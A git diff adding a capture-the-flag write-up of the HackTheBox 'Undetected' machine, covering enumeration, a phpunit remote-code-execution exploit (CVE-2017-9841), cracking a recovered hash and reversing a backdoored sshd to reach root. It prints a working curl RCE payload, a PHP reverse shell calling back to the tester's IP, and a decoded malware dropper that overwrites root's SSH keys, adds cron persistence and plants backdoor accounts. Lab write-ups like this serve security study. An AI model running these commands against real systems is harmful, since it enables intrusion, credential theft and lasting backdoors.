add: writeup-ctf

content/writeup-ctf/writeup-undetected-htb/index.md

@@ -0,0 +1,167 @@
+---
+title: "Writeup - Undetected (HTB)"
+date: 2022-04-09
+slug: "writeup-undetected-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Undectected](https://app.hackthebox.com/machines/Undetected) machine from  the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+While going on the site I notice that there is a subdomain, so I add it in the /etc/hosts file:
+
+
+```bash
+10.10.11.146 store.djewelry.htb
+```
+![](img/image-3.webp)
+
+I arrive on a new part of the site : the store. I start by searching for a folder with gobuster :
+
+
+```bash
+gobuster dir -u http://store.djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
+```
+I quickly find the "/vendor" folder:
+
+![](img/image-4.webp)
+
+A lot of potential exploit... After some research I find that this version of "phpunit" has an exploit allowing to execute remote commands via PHP ([CVE-2017-9841](https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263)).
+
+
+```bash
+┌──(kali㉿kali)-[~]
+└─$ curl --data "<?php system('id');?>" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+So I will be able to use this exploit to create a reverse shell. To do this I open a port with "nc", then I use the following command to start the session:
+
+
+```bash
+curl --data '<?php $sock=fsockopen("10.10.14.20",1234);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+
+```
+I now have a reverse shell. I'll do a first scan with [linPeas](lingeas.sh). After some analysis, I find a suspicious file in the "/var/backups" folder. After retrieving the file on my PC, I extract the information with the "strings" command.
+
+In the result of the command I find a large hexadecimal character string that I decipher with the site [Hex decode](https://www.convertstring.com/EncodeDecode/HexDecode).
+
+![](img/image-5.webp)
+
+It is a sequence of commands:
+
+
+```bash
+wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; 
+wget tempfiles.xyz/.main -O /var/lib/.main; 
+chmod 755 /var/lib/.main; 
+echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; 
+awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; 
+do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
+```
+One element is of particular interest to us, the hash of a user's password. I retrieve it and try to crack it with "john".
+
+![](img/image-6.webp)
+
+After a few seconds john finds the password: ihatehackers.
+
+We don't have the user name, but during the linPeas scan, I found that there were 2 users besides root: steven & steven1.
+
+Let's try with the two users:
+
+![](img/image-7.webp)
+
+So this is the password of steven1! I now have access to the first flag of the machine.
+
+## Privilege escalation
+
+Let's go back to our LinPeas scan. I noticed that the user steven had a mail in the folder "/var/mail" :
+
+![](img/image-8.webp)
+
+Globally the sysadmin tells us that there is a problem with apache, let's go and see in the apache folder if we notice any unusual elements.
+
+In the molules folder, there are a lot of elements, but when I look at the modification dates, I notice that they have the same date except one : mod\_reader.so.
+
+
+```bash
+ls -l /usr/lib/apache/modules
+```
+![](img/image-9.webp)
+
+I get the file on my computer and get the information with the command "strings". And as usual there is a big string, but this time in base64. I decrypt it with the following command :
+
+
+```bash
+┌──(kali㉿kali)-[~/Downloads]
+└─$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d
+wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
+```
+These are 2 commands that use the program "sshd", so I get the ssdh file for analysis with ghidra.
+
+After the analysis of ghidra, I look if there are not unusual variables or functions. And I find a function that attracts my attention: auth\_password.
+
+In this function I find the backdoor's signature and a sequence of hexadecimal characters composing a password. Let's try to recompose the password!
+
+![](img/image-10.webp)
+
+At first I put back in order the password bits. I notice that the first byte is negative, but when I right click on the value, ghidra tells me that it corresponds to "0xa5".
+
+
+```bash
+30_1	0xa5
+28_2	0xa9f4
+24_4	0xbcf0b5e3
+16_8	0xb2d6f4a0fda0b3d6
+12_4	0xfdb3d6e7
+8_4	0xf7bbfdc8
+4_4	0xa4b3a3f3
+0_4	0xf0e7abd6
+```
+ In total, I find that it corresponds to 31 bytes, it's a good sign it's the size of the "backdoor" variable!
+
+I notice that at the end of the processing the following calculation is done: "\*pbVar4 = bVar7 ^ 0x96". This corresponds to an XOR with the value 96.
+
+I have all the elements, so I should be able to find the password with the help of [CyberChef](https://gchq.github.io/CyberChef). I add the following modules:
+
+- Swap endianness -> 31 word length
+- From Hex
+- XOR -> key : 96
+
+{{< alert icon="circle-info" >}}
+The "Swap endianness" function allows to convert little endian and big endian (or vice versa). These are two possibilities to store information.At the end cyberchef returns the following string:
+{{< /alert >}}
+
+```bash
+@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
+```
+Let's try to connect to root with this password:
+
+![](img/image-11.webp)
+
+And it works, so I can get the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Mettre a jour phpunit pour la dernière version
+- Do not leave files with hashes visible to everyone / use stronger passwords
+- Use key authentication for ssh root connection